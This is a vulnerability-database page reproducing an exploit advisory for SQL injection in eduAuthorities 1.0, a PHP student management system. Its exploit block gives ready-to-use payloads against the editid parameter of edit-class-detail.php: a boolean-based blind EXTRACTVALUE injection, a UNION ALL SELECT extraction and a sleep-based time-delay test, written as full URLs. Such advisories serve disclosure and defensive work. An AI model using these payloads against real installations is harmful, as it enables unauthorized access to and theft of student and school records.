Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

eduAuthorities 1.0 SQL Injection

🗓️ 06 Aug 2024 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 262 Views

The eduAuthorities 1.0 software from mayurik.com is vulnerable to SQL injection attacks, allowing attackers to gain unauthorized access to the system and potentially extract sensitive information. The vulnerability was confirmed through different responses to specific payloads and a significant increase in response time. An example exploit URL is provided for further reference

Code
`## Titles: eduAuthorities-1.0 Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 07/29/2024  
## Vendor: https://www.mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The editid parameter appears to be vulnerable to SQL injection attacks. The  
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each  
submitted in the editid parameter. These two requests resulted in different  
responses, indicating that the input is being incorporated into a SQL query  
in an unsafe way. Note that automated difference-based tests for SQL  
injection flaws can often be unreliable and are prone to false positive  
results. You should manually review the reported requests and responses to  
confirm whether a vulnerability is actually present.  
Additionally, the payload (select*from(select(sleep(20)))a) was submitted  
in the editid parameter. The application took 20011 milliseconds to respond  
to the request, compared with 3 milliseconds for the original request,  
indicating that the injected SQL command caused a time delay.The attacker  
can get all information from the system by using this vulnerability!  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP  
BY clause (EXTRACTVALUE)  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488  
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#  
UiVZfrom(select(sleep(3)))a)  
  
Type: UNION query  
Title: MySQL UNION query (random number) - 3 columns  
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962  
UNION ALL SELECT  
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)  
  
## More:  
[href](  
https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)  
  
## Time spent:  
00:37:00  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
eduauthorities 1.0sql injectionmayurikvulnerabilityexploitsresponse timereference url
262